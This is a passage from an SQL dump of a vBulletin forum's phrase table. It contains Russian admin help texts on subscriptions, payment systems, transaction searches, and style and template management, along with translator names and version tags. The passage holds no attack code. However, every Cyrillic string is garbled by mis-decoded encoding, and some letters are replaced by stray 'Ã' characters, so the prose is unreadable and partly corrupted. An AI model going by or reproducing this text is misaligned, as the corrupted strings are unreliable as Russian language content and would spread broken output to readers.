'vbulletin', '', 0, ''), (23994, -1, 'subscriptions_apiadd_apiedit_classname_text', 'cphelptext', 'Äàííîå èìÿ áóäåò èñïîëüçîâàòüñÿ äëÿ ñîçäàíèÿ è ïîñëåäóþùåãî âûçîâà ôàéëà êëàññà ñèñòåìû ïëàòåæåé. Ãîñìîòðèòå ôàéëû êëàññîâ â äèðåêòîðèè includes/paymentapi. Ãàïðèìåð, åñëè èìÿ êëàññà \"wm\", òî êëàññ áóäåò ðàñïîëîæåí çäåñü: includes/paymentapi/class_wm.php', 'vbulletin', '', 0, ''), (23995, -1, 'subscriptions_apiadd_apiedit_classname_title', 'cphelptext', 'Ãàçâàíèå êëàññà', 'vbulletin', '', 0, ''), (23996, -1, 'subscriptions_apiadd_apiedit_currency_text', 'cphelptext', 'Çäåñü óêàçûâàþòñÿ ïîääåðæèâàåìûå âàëþòû ñ ïîìîùüþ àááðåâèàòóð, ðàçäåëÿåìûõ çàïÿòûìè. Ñïèñîê îáîçíà÷åíèé äîñòóïåí íà ýòîì ñàéòå.

\r\n\r\nÃàïðèìåð, åñëè âû æåëàåòå ïðèíèìàòü äîëëàðû ÑØÀ, åâðî è ðóáëè, òî â ýòî ïîëå ñëåäóåò ââåñòè:

\r\n\r\nusd,eur,rub', 'vbulletin', '', 0, ''), (23997, -1, 'subscriptions_apiadd_apiedit_currency_title', 'cphelptext', 'Ãîääåðæèâàåìàÿ âàëþòà', 'vbulletin', '', 0, ''), (23998, -1, 'subscriptions_apiadd_apiedit_recurring_text', 'cphelptext', 'Ñèñòåìà ïëàòåæåé ïîääåðæèâàåò âîçâðàò ïëàòåæà?', 'vbulletin', '', 0, ''), (23999, -1, 'subscriptions_apiadd_apiedit_recurring_title', 'cphelptext', 'Ãîääåðæêà âîçâðàòà ïëàòåæà', 'vbulletin', '', 0, ''), (24000, -1, 'subscriptions_apiedit_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì îòðåäàêòèðîâàòü ñóùåñòâóþùèé ñïîñîá îïëàòû. Ãàðàìåòðû ðåäàêòèðîâàíèÿ îïèñàíû íèæå.', 'vbulletin', '', 0, ''), (24001, -1, 'subscriptions_apiedit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå ñïîñîáà', 'vbulletin', '', 0, ''), (24002, -1, 'subscriptions_apirem_text', 'cphelptext', 'Ãòà ñòðàíèöà - ïîäòâåðæäåíèå óäàëåíèÿ âûáðàííîãî ñïîñîáà îïëàòû. Äåéñòâèå íå ìîæåò áûòü îòìåíåíî.', 'vbulletin', '', 0, ''), (24003, -1, 'subscriptions_apirem_title', 'cphelptext', 'Óäàëåíèå ñïîñîáà', 'vbulletin', '', 0, ''), (24004, -1, 'subscriptions_edit_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì îòðåäàêòèðîâàòü ýòó ïîäïèñêó. Åñëè ó âàñ åñòü âîïðîñû ïî îïöèÿì íèæå, òî èçó÷èòå ñîîòâåòñòâóþùèå ñïðàâî÷íûå ñòàòüè.

\r\n\r\nÅñëè âû æåëàåòå èñïîëüçîâàòü ýòó ïîäïèñêó äëÿ óïðàâëåíèÿ ìàñêàìè äîñòóïà ïîëüçîâàòåëåé, òî óáåäèòåñü, ÷òî ìàñêè äîñòóïà âêëþ÷åíû â âàøèõ îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24005, -1, 'subscriptions_edit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå ïîäïèñêè', 'vbulletin', '', 0, ''), (24006, -1, 'subscriptions_find_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê ïîëüçîâàòåëåé, ïîäïèñàííûõ íà ýòó ïîäïèñêó. Ãàæìèòå ñïðàâà êíîïêó \"Ãåäàêòèðîâàòü\", ÷òîáû îòðåäàêòèðîâàòü ñîîòâåòñòâóþùóþ ïîäïèñêó.

\r\n\r\nÊîëîíêà \"Ãàçâàíèå\" îòîáðàæàåò íàçâàíèå ïîäïèñêè äëÿ ñîîòâåòñòâóþùåé çàïèñè.

\r\n\r\nÊîëîíêà \"Èìÿ ïîëüçîâàòåëÿ\" îòîáðàæàåò ïîëüçîâàòåëåé, ïîäïèñàííûõ íà ñîîòâåòñòâóþùóþ ïîäïèñêó. Âû ìîæåòå íàæàòü íà èìÿ ïîëüçîâàòåëÿ, ÷òîáû ïðîñìîòðåòü åãî ïðîôèëü.

\r\n\r\nÊîëîíêà \"Äàòà íà÷àëà\" îòîáðàæàåò äàòó ïîäïèñàíèÿ. Åñëè âðåìÿ, ïðîøåäøåå ñ äàòû íà÷àëà, áîëüøå ïðîäîëæèòåëüíîñòè ïîäïèñêè, ÷òî â êîëîíêå \"Ñòàòóñ\" áóäåò íàïèñàíî \"Âûêëþ÷åíà\".  ïðîòèâíîì ñëó÷àå - \"Àêòèâíàÿ\"', 'vbulletin', '', 0, ''), (24007, -1, 'subscriptions_find_title', 'cphelptext', 'Ãîêàçàòü ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24008, -1, 'subscriptions_modify_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ïîäïèñîê (åñëè åñòü). Êîëîíêà \"Ãàçâàíèå\" îòîáðàæàåò íàçâàíèå ñîîòâåòñòâóþùåé ïîäïèñêè. Ãàçâàíèå èñïîëüçóåòñÿ äëÿ èäåíòèôèêàöèè ïîäïèñêè äëÿ âàøèõ ïîëüçîâàòåëåé íà âàøåì ôîðóìå è â ýòîì óïðàâëåíèè ïîäïèñêàìè.

\r\n\r\nÊîëîíêà \"Ñòîèìîñòü\" ñîäåðæèò ñòîèìîñòü ñîîòâåòñòâóþùèõ ïîäïèñîê äëÿ âñåõ ïîääåðæèâàåìûõ âàëþò.

\r\n\r\nÊîëîíêà \"Àêòèâíî\" îòîáðàæàåò âàì êîëè÷åñòâî àêòèâíûõ ïîäïèñîê äëÿ ñîîòâåòñòâóþùåé ïîäïèñêè. Àêòèâíûå ïîäïèñêè - òå, êîòîðûå áûëè ïîäïèñàíû íå ïîçäíåå ïðîäîëæèòåëüíîñòè ïîäïèñêè.

\r\n\r\nÊîëîíêà \"Çàâåðøåíî\" îòîáðàæàåò êîëè÷åñòâî íåàêòèâíûõ ïîäïèñîê. Ãåàêòèâíûå ïîäïèñêè - òå, êîòîðûå áûëè ïîäïèñàíû ïîçäíåå ïðîäîëæèòåëüíîñòè ïîäïèñêè.

\r\n\r\nÊîëîíêà \"Âñåãî\" îòîáðàæàåò ñóììó àêòèâíûõ è íåàêòèâíûõ ïîäïèñîê äëÿ ñîîòâåòñòâóþùåé ïîäïèñêè.

\r\n\r\nÊîëîíêà \"Óïðàâëåíèå\" ñîäåðæèò îïöèè äëÿ êàæäîé ïîäïèñêè. Îïöèÿ \"Ãåäàêòèðîâàòü\" ïîçâîëÿåò âàì îòðåäàêòèðîâàòü íàñòðîéêè äëÿ ïîäïèñêè, âêëþ÷àÿ: íàçâàíèå, îïèñàíèå, ñòîèìîñòü, ãðóïïû ó÷àñòíèêîâ è ìàñêè äîñòóïà. Îïöèÿ \"Óäàëèòü\" óäàëÿåò ïîäïèñêó. Îïöèÿ \"Ãðîñìîòð ïîëüçîâàòåëåé\" îòîáðàæàåò âàì âñåõ ïîëüçîâàòåëåé, ïîäïèñàííûõ íà ýòó ïîäïèñêó, ñ óêàçàíèåì àêòèâíà èõ ïîäïèñêà èëè íåò. È, íàêîíåö, îïöèÿ \"Äîáàâèòü ïîëüçîâàòåëÿ\" ïîçâîëÿåò âàì ñàìîñòîÿòåëüíî ïîäïèñàòü ïîëüçîâàòåëÿ íà ñîîòâåòñòâóþùóþ ïîäïèñêó.', 'vbulletin', 'zCarot', 1207908565, '3.7.0 Release Candidate 4'), (24009, -1, 'subscriptions_modify_title', 'cphelptext', 'Óïðàâëåíèå ïîäïèñêàìè', 'vbulletin', '', 0, ''), (24010, -1, 'subscriptions_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå òîãî, ÷òî âû æåëàåòå óäàëèòü ýòó ïîäïèñêó. Ãàæìèòå êíîïêó \"Äà\" äëÿ óäàëåíèÿ.', 'vbulletin', '', 0, ''), (24011, -1, 'subscriptions_remove_title', 'cphelptext', 'Óäàëèòü ïîäïèñêè', 'vbulletin', '', 0, ''), (24012, -1, 'subscriptions_transactions_currency_text', 'cphelptext', 'Èñïîëüçóéòå âûïàäàþùèé ñïèñîê, ÷òîáû âûáðàòü îïðåäåë¸ííóþ âàëþòó.', 'vbulletin', 'zCarot', 1147123961, '3.6.0 Beta 1'), (24013, -1, 'subscriptions_transactions_currency_title', 'cphelptext', 'Âàëþòà', 'vbulletin', 'zCarot', 1147123961, '3.6.0 Beta 1'), (24014, -1, 'subscriptions_transactions_end_text', 'cphelptext', 'Âûáåðèòå êîíå÷íóþ äàòó äëÿ çàïðîñà. Âûáåðèòå ìåñÿö, äåíü è ãîä. Âûáðàííûå äåíåæíûå ïåðåâîäû äîëæíû áûòü ñòàðøå ýòîé äàòû, ÷òîáû îíè áûëè îòîáðàæåíû â ðåçóëüòàòàõ. Âû ìîæåòå èñïîëüçîâàòü ýòîò ïàðàìåòð âìåñòå ñ ïàðàìåòðîì \"Ãà÷àëüíàÿ äàòà\", ÷òîáû çàäàòü âðåìåííîé ïðîìåæóòîê.', 'vbulletin', 'zCarot', 1147123893, '3.6.0 Beta 1'), (24015, -1, 'subscriptions_transactions_end_title', 'cphelptext', 'Êîíå÷íàÿ äàòà', 'vbulletin', 'zCarot', 1147123893, '3.6.0 Beta 1'), (24016, -1, 'subscriptions_transactions_exact_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîèñê ïî íîìåðó äåíåæíîãî ïåðåâîäà áóäåò ïðîèçâîäèòüñÿ èñõîäÿ èç òî÷íîãî ñðàâíåíèÿ. Åñëè \"Ãåò\", òî èä¸ò ÷àñòè÷íîå ñðàâíåíèå, íàïðèìåð, ïðè ïîèñêå \"x123\" ðåçóëüòàòîì ìîæåò áûòü \"ABCx123DEF\".', 'vbulletin', 'zCarot', 1147124164, '3.6.0 Beta 1'), (24017, -1, 'subscriptions_transactions_exact_title', 'cphelptext', 'Òî÷íîå ñîîòâåòñòâèå', 'vbulletin', 'zCarot', 1147124164, '3.6.0 Beta 1'), (24018, -1, 'subscriptions_transactions_orderby_text', 'cphelptext', 'Óêàæèòå ñïîñîá ñîðòèðîâêè. Âû òàêæå ñìîæåòå èçìåíèòü ñïîñîá ñîðòèðîâêè, íàæàâ íà íàçâàíèÿ êîëîíîê ïðè ïðîñìîòðå ðåçóëüòàòîâ.', 'vbulletin', 'zCarot', 1147124032, '3.6.0 Beta 1'), (24019, -1, 'subscriptions_transactions_orderby_title', 'cphelptext', 'Ñîðòèðîâêà ïî', 'vbulletin', 'zCarot', 1147124032, '3.6.0 Beta 1'), (24020, -1, 'subscriptions_transactions_paymentapiid_text', 'cphelptext', 'Óêàæèòå çäåñü ñèñòåìó ïëàòåæåé, ÷åðåç êîòîðóþ ïðîèçâîäèëèñü îïåðàöèè.', 'vbulletin', 'zCarot', 1147123941, '3.6.0 Beta 1'), (24021, -1, 'subscriptions_transactions_paymentapiid_title', 'cphelptext', 'Ìåòîä', 'vbulletin', 'zCarot', 1147123941, '3.6.0 Beta 1'), (24022, -1, 'subscriptions_transactions_scope_text', 'cphelptext', 'Âûáåðèòå âðåìåííîé ïðîìåæóòîê, äåéñòâèÿ â òå÷åíèè êîòîðîãî âû æåëàåòå óâèäåòü â ðåçóëüòàòå. \"Çà äåíü\" îòîáðàçèò âñå äåíåæíûå ïåðåâîäû, êîòîðûå ïðîøëè çà îäèí äåíü. \"Çà íåäåëþ\" îòîáðàçèò âñå äåíåæíûå ïåðåâîäû, ïðîøåäøèå çà íåäåëþ. \"Çà ìåñÿö\" îòîáðàçèò âñå äåíåæíûå ïåðåâîäû, êîòîðûå ïðîøëè çà ìåñÿö.', 'vbulletin', 'zCarot', 1147124266, '3.6.0 Beta 1'), (24023, -1, 'subscriptions_transactions_scope_title', 'cphelptext', 'Ãîêàçàòü', 'vbulletin', 'zCarot', 1147124266, '3.6.0 Beta 1'), (24024, -1, 'subscriptions_transactions_start_text', 'cphelptext', 'Âûáåðèòå íà÷àëüíóþ äàòó äëÿ çàïðîñà. Âûáåðèòå ìåñÿö, äåíü è ãîä. Âûáðàííûå äåíåæíûå ïåðåâîäû äîëæíû áûòü íîâåå ýòîé äàòû, ÷òîáû îíè áûëè îòîáðàæåíû â ðåçóëüòàòàõ.', 'vbulletin', 'zCarot', 1147123869, '3.6.0 Beta 1'), (24025, -1, 'subscriptions_transactions_start_title', 'cphelptext', 'Ãà÷àëüíàÿ äàòà', 'vbulletin', 'zCarot', 1147123869, '3.6.0 Beta 1'), (24026, -1, 'subscriptions_transactions_state_text', 'cphelptext', 'Óêàæèòå çäåñü ðåçóëüòàò îïåðàöèè: íåóäà÷íûå, óäà÷íûå è âîçâðàò äåíåã.', 'vbulletin', 'zCarot', 1147123981, '3.6.0 Beta 1'), (24027, -1, 'subscriptions_transactions_state_title', 'cphelptext', 'Òèï', 'vbulletin', 'zCarot', 1147123981, '3.6.0 Beta 1'), (24028, -1, 'subscriptions_transactions_subscriptionid_text', 'cphelptext', 'Óêàæèòå çäåñü ïîäïèñêó, çà êîòîðóþ ïðîèçâîäèëèñü îïåðàöèè.', 'vbulletin', 'zCarot', 1147123923, '3.6.0 Beta 1'), (24029, -1, 'subscriptions_transactions_subscriptionid_title', 'cphelptext', 'Ãîäïèñêè', 'vbulletin', 'zCarot', 1147123923, '3.6.0 Beta 1'), (24030, -1, 'subscriptions_transactions_transactionid_text', 'cphelptext', 'Ãòîò ïàðàìåòð èñïîëüçóåòñÿ äëÿ ïîèñêà îïðåäåë¸ííîãî íîìåðà äåíåæíîãî ïåðåâîäà. Ãîìåð äåíåæíîãî ïåðåâîäà ýòî íîìåð, êîòîðûé ïðèñâàèâàåòñÿ äåíåæíîé îïåðàöèè ñèñòåìîé ïëàòåæåé. Ãòîò íîìåð îáû÷íî âêëþ÷àåòñÿ â êàæäîå ýëåêòðîííîå ïèñüìî, îòïðàâëÿåìîå ñèñòåìîé ïëàòåæåé, à òàêæå ñîõðàíÿåòñÿ â öåíòðå àäìèíèñòðèðîâàíèÿ ïëàòåæåé.', 'vbulletin', 'zCarot', 1147124099, '3.6.0 Beta 1'), (24031, -1, 'subscriptions_transactions_transactionid_title', 'cphelptext', 'Ãîìåð äåíåæíîãî ïåðåâîäà', 'vbulletin', 'zCarot', 1147124099, '3.6.0 Beta 1'), (24032, -1, 'subscriptions_transactions_username_text', 'cphelptext', 'Óêàæèòå çäåñü èìÿ ïîëüçîâàòåëÿ, êîòîðûé ïðîèçâîäèë îïåðàöèè.', 'vbulletin', 'zCarot', 1147123996, '3.6.0 Beta 1'), (24033, -1, 'subscriptions_transactions_username_title', 'cphelptext', 'Èìÿ ïîëüçîâàòåëÿ', 'vbulletin', 'zCarot', 1147123996, '3.6.0 Beta 1'), (24034, -1, 'template_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÑòèëè è øàáëîíû
\r\nÎáùèå øàáëîíû, ïåðåìåííûå ñòèëÿ è CSS
\r\nÇàìåùàåìûå ïåðåìåííûå

\r\n\r\nÃàñëåäîâàíèå:
\r\nÑòèëè ôîðóìà èñïîëüçóþò íàñëåäîâàíèå äëÿ óïðàâëåíèÿ øàáëîíàìè è íàñòðîéêàìè ñòèëåé. Ãîäñòèëü íàñëåäóåò øàáëîíû è íàñòðîéêè ñâîåãî ðîäèòåëüñêîãî ñòèëÿ. Ãàïðèìåð, åñëè øàáëîí èçìåíåí â ðîäèòåëüñêîì ñòèëå, òî âñå ïîäñòèëè óíàñëåäóþò ýòîò èçìåíåííûé øàáëîí.

\r\n\r\nÄîïóñòèìîå ïðèìåíåíèå íàñëåäîâàíèÿ ñòèëåé âêëþ÷àåò â ñåáÿ ñîçäàíèå âàðèàöèé íà òåìó. Äàâàéòå ïðåäñòàâèì, ÷òî ó âàñ åñòü ñòèëü ñ èçìåíåííûì øàáëîíîâ, êîòîðûé çàäà¸ò ñïåöèôè÷åñêîå îòîáðàæåíèå ñîäåðæèìîãî âàøåãî ôîðóìà, íî âû æåëàåòå, ÷òîáû ïîëüçîâàòåëè ìîãëè âûáðàòü ðàçíîîáðàçíóþ ðàñöâåòêó, èñïîëüçóÿ òå æå øàáëîíû.  ýòîé ñèòóàöèè âû ìîæåòå ñîçäàòü ïîäñòèëè ñ èçìåíåííîé íàñòðîéêîé øàáëîíîâ. Ãîäñòèëè áóäóò íàñëåäîâàòü âñå èçìåíåíèÿ ðîäèòåëüñêîãî ñòèëÿ, òî åñòü áóäóò èìåòü òîæå îòîáðàæåíèå, íî ñ ñîáñòâåííîé ðàñöâåòêîé, êîòîðàÿ íå áóäåò íàñëåäîâàòüñÿ.

\r\n\r\nÑèëà íàñëåäîâàíèÿ ìîæåò áûòü ðàññìîòðåíà íà ñëåäóþùåì ïðèìåðå: ïðè ñîçäàíèè âàðèàöèé íà òåìó áåç íàñëåäîâàíèÿ âàì ïîòðåáóåòñÿ ñäåëàòü äóáëèêàòû øàáëîíîâ äëÿ êàæäîãî ñòèëÿ, è ëþáîå èçìåíåíèå øàáëîíîâ çàñòàâèò âàñ èçìåíèòü èõ âî âñåõ ñòèëÿõ, ÷òî î÷åíü äîëãî. Ñ íàñëåäîâàíèåì âàì íóæíî áóäåò ïðîñòî èçìåíèòü ðîäèòåëüñêèé øàáëîí.

\r\n\r\nÓñëîâèÿ øàáëîíîâ:
\r\nÔîðóì ïîääåðæèâàåò óñëîâèÿ â ñâîèõ øàáëîíàõ. Óñëîâèÿ ïîçâîëÿò âàì îòîáðàæàòü èëè íå îòîáðàæàòü êîä â øàáëîíàõ, îñíîâûâàÿñü íà óñëîâèÿõ áóëåâîé îöåíêè ïðàâäû èëè ëæè. Âîò ïðèìåð ñèíòàêñèñà:

\r\n\r\n<if condition=\"$bbuserinfo[userid]\">
\r\nêîä, êîòîðûé îòîáðàçèòñÿ, åñëè ïîëüçîâàòåëü çàðåãèñòðèðîâàí è âîø¸ë (íå ãîñòü)
\r\n<else />
\r\nêîä, êîòîðûé îòîáðàçèòñÿ, åñëè ïîëüçîâàòåëü íå çàðåãèñòðèðîâàëñÿ èëè íå âîø¸ë (ãîñòü)
\r\n</if>


\r\n\r\n ïðèìåðå âûøå óñëîâèå ïðîâåðÿåò, âîø¸ë èëè íåò çàðåãèñòðèðîâàííûé ïîëüçîâàòåëü, ñ ïîìîùüþ ïðîâåðêè id ïîëüçîâàòåëÿ (ãîñòè èìåþò id ïîëüçîâàòåëÿ ðàâíûé 0, ÷òî ýêâèâàëåíòíî ëæè). Êîä green áóäåò âêëþ÷åí ïðè âûâîäå ñòðàíèöû íà ýêðàí, åñëè ïîëüçîâàòåëü âîø¸ë (óñëîâèå - ïðàâäà). Ëèáî êîä red áóäåò âêëþ÷åí, åñëè ïîëüçîâàòåëü íåâîø¸ë (óñëîâèå - ëîæíî). Òåã <else /> è êîä red íå îáÿçàòåëüíû.

\r\n\r\nÌàññèâ $bbuserinfo â ïðèìåðå âûøå ñîäåðæèò â ñåáå âñþ èíôîðìàöèþ î ïîëüçîâàòåëå, è îí ãëîáàëåí äëÿ âñåõ øàáëîíîâ ôîðóìà. Ìàññèâ $vboptions òàêæå ÿâëÿåòñÿ ãëîáàëüíûì, îí ñîäåðæèò çíà÷åíèÿ âàøèõ îïöèé ôîðóìà. Åñëè âàì òðåáóåòñÿ ïîìîùü ïî ñîçäàíèþ óñëîâèé, èñïîëüçóÿ ïåðåìåííûå ôîðóìà, òî ñîîáùèòå îá ýòîì íà ôîðóìå vBulletin.com.', 'vbulletin', 'zCarot', 1205942760, '3.7.0 Release Candidate 1'), (24035, -1, 'template_title', 'cphelptext', 'ÃŽ ñòèëÿõ è øàáëîíàõ', 'vbulletin', '', 0, ''), (24036, -1, 'template_add_dostyleid_text', 'cphelptext', 'Ãòî ñïèñîê áûñòðîãî âûáîðà èç âñåõ âàøèõ óñòàíîâëåííûõ ñòèëåé. Îí ïîçâîëÿåò âàì áûñòðî ïåðåêëþ÷àòüñÿ ìåæäó íèìè. Ãðè ðåäàêòèðîâàíèè øàáëîíîâ óáåäèòåñü, ÷òî îòîáðàæàåìûé çäåñü ñòèëü ñîîòâåòñòâóåò òîìó, â êîòîðîì âû æåëàåòå ñäåëàòü èçìåíåíèÿ.', 'vbulletin', '', 0, ''), (24037, -1, 'template_add_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''), (24038, -1, 'template_add_edit_text', 'cphelptext', ' ðåäàêòîðå øàáëîíîâ âû ìîæåòå èçìåíÿòü øàáëîíû, êîòîðûå èçìåíÿò îáëèê âàøåãî ôîðóìà. Çäåñü âû èçìåíÿåòå HTML èíäèâèäóàëüíûõ øàáëîíîâ.', 'vbulletin', '', 0, ''), (24039, -1, 'template_add_edit_title', 'cphelptext', 'Ãåäàêòîð øàáëîíîâ', 'vbulletin', '', 0, ''), (24040, -1, 'template_add_edit_title_text', 'cphelptext', 'Ââåäèòå ñþäà íàçâàíèå âàøåãî øàáëîíà. Îíî áóäåò èìåíåì, îòçûâàþùèìñÿ ïðè âûçîâå ñèñòåìîé. Îíî óæå áóäåò óêàçàíî, åñëè âû ðåäàêòèðóéòå ñóùåñòâóþùèé øàáëîí.\r\n\r\nÃîìíèòå: ïðè äîáàâëåíèè äîïîëíèòåëüíûõ øàáëîíîâ, âû äîëæíû òàêæå íàïèñàòü êîä PHP äëÿ èõ âûçîâà.', 'vbulletin', '', 0, ''), (24041, -1, 'template_add_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (24042, -1, 'template_add_edit_template_text', 'cphelptext', '

Çäåñü âû ðåäàêòèðóéòå HTML. Ëþáîé ïðàâèëüíûé HTML êîä äîïóñòèì çäåñü. Äëÿ òîãî, ÷òîáû óçíàòü, êàê èñïîëüçîâàòü HTML, ïîñåòèòå www.w3c.org.

\r\n\r\n

Ôîðóì òàêæå ïîääåðæèâàåò íåñêîëüêî ñïåöèàëüíûõ òåãîâ, êîòîðûå ìîãóò áûòü èñïîëüçîâàíû çäåñü. Çäåñü äîïóñòèìû òåãè <phrase> è <if>. Èçó÷èòå ñïðàâî÷íûå ñòàòüè ðàçäåëà \"Î ñòèëÿõ ôîðóìà\", íàæàâ íà èçîáðàæåíèå ñ âîïðîñîì â çàãîëîâêå.

', 'vbulletin', '', 0, ''), (24043, -1, 'template_add_edit_template_title', 'cphelptext', 'Øàáëîí', 'vbulletin', '', 0, ''), (24044, -1, 'template_addstyle_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëèò âàì ñîçäàòü íîâûé ñòèëü. Äëÿ ïîëó÷åíèÿ ñïðàâêè ïî îïöèÿì íèæå, íàæìèòå íà çíàêè âîïðîñà â çàãîëîâêàõ îïöèé.', 'vbulletin', '', 0, ''), (24045, -1, 'template_addstyle_title', 'cphelptext', 'Äîáàâëåíèå ñòèëÿ', 'vbulletin', '', 0, ''), (24046, -1, 'template_addstyle_editstyle_files_parentid_text', 'cphelptext', 'Ñ ýòîãî ñòèëÿ áóäóò íàñëåäîâàòüñÿ øàáëîíû, íàñòðîéêè è ïðî÷åå. Ëþáûå èçìåíåíèÿ, ñäåëàííûå â ðîäèòåëüñêîì ñòèëå, áóäóò ïðèìåíåíû ê íàñëåäóåìûì ñòèëÿì.', 'vbulletin', '', 0, ''), (24047, -1, 'template_addstyle_editstyle_files_parentid_title', 'cphelptext', 'Ãîäèòåëüñêèé ñòèëü', 'vbulletin', '', 0, ''), (24048, -1, 'template_addstyle_editstyle_files_title_text', 'cphelptext', 'Ãòî íàçâàíèå ñòèëÿ. Ãàçâàíèå èñïîëüçóåòñÿ äëÿ èäåíòèôèêàöèè ñòèëÿ â óïðàâëåíèè ñòèëÿìè â ïàíåëè àäìèíèñòðàòîðà è ïðè âûáîðå ñòèëåé â ëåâîì íèæíåì óãëó âàøåãî ôîðóìà.', 'vbulletin', '', 0, ''), (24049, -1, 'template_addstyle_editstyle_files_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (24050, -1, 'template_addstyle_editstyle_files_userselect_text', 'cphelptext', 'Âêëþ÷èâ ýòó îïöèþ, âû ðàçðåøèòå ïîëüçîâàòåëÿì âûáèðàòü ýòîò ñòèëü äëÿ èñïîëüçîâàíèÿ íà âàøåì ôîðóìå.', 'vbulletin', '', 0, ''), (24051, -1, 'template_addstyle_editstyle_files_userselect_title', 'cphelptext', 'Ãàçðåøèòü âûáîð ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24052, -1, 'template_addstyle_editstyle_files_displayorder_text', 'cphelptext', 'Ãòî ïîðÿäîê îòîáðàæåíèÿ, èñïîëüçóåìûé äëÿ ñîðòèðîâêè ñïèñêà ñòèëåé íà ýòîì óðîâíå ñòèëåé â óïðàâëåíèè ñòèëÿìè â ïàíåëè àäìèíèñòðàòîðà è ïðè âûáîðå ñòèëåé â ëåâîì íèæíåì óãëó âàøåãî ôîðóìà.

\r\n\r\nÃàïðèìåð, âîò òàêîå äåðåâî ñòèëåé áóäåò èìåòü ñëåäóþùèé ïîðÿäîê îòîáðàæåíèÿ:

\r\n\r\nÎÑÃÎÂÃÎÉ ÑÒÈËÜ - 1
\r\n-- Ãîäñòèëü - 1
\r\n-- Äðóãîé ïîäñòèëü - 2
\r\n---- Ãîä-ïîäñòèëü - 1
\r\n---- Äðóãîé ïîä-ïîäñòèëü - 2
\r\n-- Åù¸ ïîäñòèëü - 3', 'vbulletin', '', 0, ''), (24053, -1, 'template_addstyle_editstyle_files_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðàæåíèÿ ïî', 'vbulletin', '', 0, ''), (24054, -1, 'template_delete_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì âîçâðàòèòü øàáëîí ê îáû÷íîìó çíà÷åíèþ. Åñëè øàáëîí ÿâëÿåòñÿ ÷àñòüþ ðîäèòåëüñêîãî ñòèëÿ, òî øàáëîíû ïîäñòèëåé òàêæå âîçâðàòÿò çíà÷åíèå îáû÷íîãî øàáëîíà. Ãîäñòèëè íàñëåäóþò äîïîëíèòåëüíûå øàáëîíû ðîäèòåëüñêèõ ñòèëåé.', 'vbulletin', '', 0, ''), (24055, -1, 'template_delete_title', 'cphelptext', 'Óäàëåíèå øàáëîíà', 'vbulletin', '', 0, ''), (24056, -1, 'template_deletestyle_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì óäàëèòü ýòîò ñòèëü. Ãàæìèòå êíîïêó \"Äà\" äëÿ óäàëåíèÿ. Âîññòàíîâëåíèå íåâîçìîæíî!', 'vbulletin', '', 0, ''), (24057, -1, 'template_deletestyle_title', 'cphelptext', 'Óäàëèòü ñòèëü', 'vbulletin', '', 0, ''), (24058, -1, 'template_editstyle_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì îòðåäàêòèðîâàòü îñíîâíûå íàñòðîéêè ñòèëÿ, âêëþ÷àÿ ðîäèòåëüñêèé ñòèëü, íàçâàíèå, âîçìîæíîñòü èñïîëüçîâàíèÿ ïîëüçîâàòåëÿìè è ïîðÿäîê îòîáðàæåíèÿ.', 'vbulletin', '', 0, ''), (24059, -1, 'template_editstyle_title', 'cphelptext', 'Ãåäàêòèðîâàòü íàñòðîéêè', 'vbulletin', '', 0, ''), (24060, -1, 'template_files_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå ñêà÷àòü è çàãðóçèòü ñòèëè, èñïîëüçóÿ ðàçíîîáðàçíûå îïöèè. Ñìîòðèòå èíäèâèäóàëüíûå ðàçäåëû ïîìîùè äëÿ îïèñàíèÿ êàæäîé îïöèè.', 'vbulletin', '', 0, ''), (24061, -1, 'template_files_title', 'cphelptext', 'Ñêà÷èâàíèå/çàãðóçêà ñòèëÿ', 'vbulletin', '', 0, ''), (24062, -1, 'template_files_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, êîòîðûé æåëàåòå ñêà÷àòü.', 'vbulletin', '', 0, ''), (24063, -1, 'template_files_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''), (24064, -1, 'template_files_product_text', 'cphelptext', 'Âûáåðèòå ïðîäóêò, øàáëîíû êîòîðîãî âû æåëàåòå ñêà÷àòü.', 'vbulletin', '', 0, ''), (24065, -1, 'template_files_product_title', 'cphelptext', 'Ãðîäóêò', 'vbulletin', '', 0, ''), (24066, -1, 'template_files_filename_text', 'cphelptext', 'Ãòî èìÿ ôàéëà, â êîòîðûé áóäåò ñîõðàíåí ñòèëü. Èìÿ äîëæíî çàêàí÷èâàòüñÿ ðàñøèðåíèåì .xml', 'vbulletin', '', 0, ''), (24067, -1, 'template_files_filename_title', 'cphelptext', 'Èìÿ ôàéëà', 'vbulletin', '', 0, ''), (24068, -1, 'template_files_mode_text', 'cphelptext', 'Ñòèëè íàñëåäóþò øàáëîíû, íàñòðîéêè è ïðî÷åå èç ðîäèòåëüñêèõ ñòèëåé. Åñëè âû æåëàåòå ñêà÷àòü ñòèëü òàê, êàê îí îòîáðàæàåòñÿ íà âàøåì ôîðóìå, òî âàì ñëåäóåò âûáðàòü âòîðóþ îïöèþ.', 'vbulletin', '', 0, ''), (24069, -1, 'template_files_mode_title', 'cphelptext', 'Îïöèè', 'vbulletin', '', 0, ''), (24070, -1, 'template_files_stylefile_text', 'cphelptext', 'Ãàæìèòå íà êíîïêó \"Îáçîð\" è 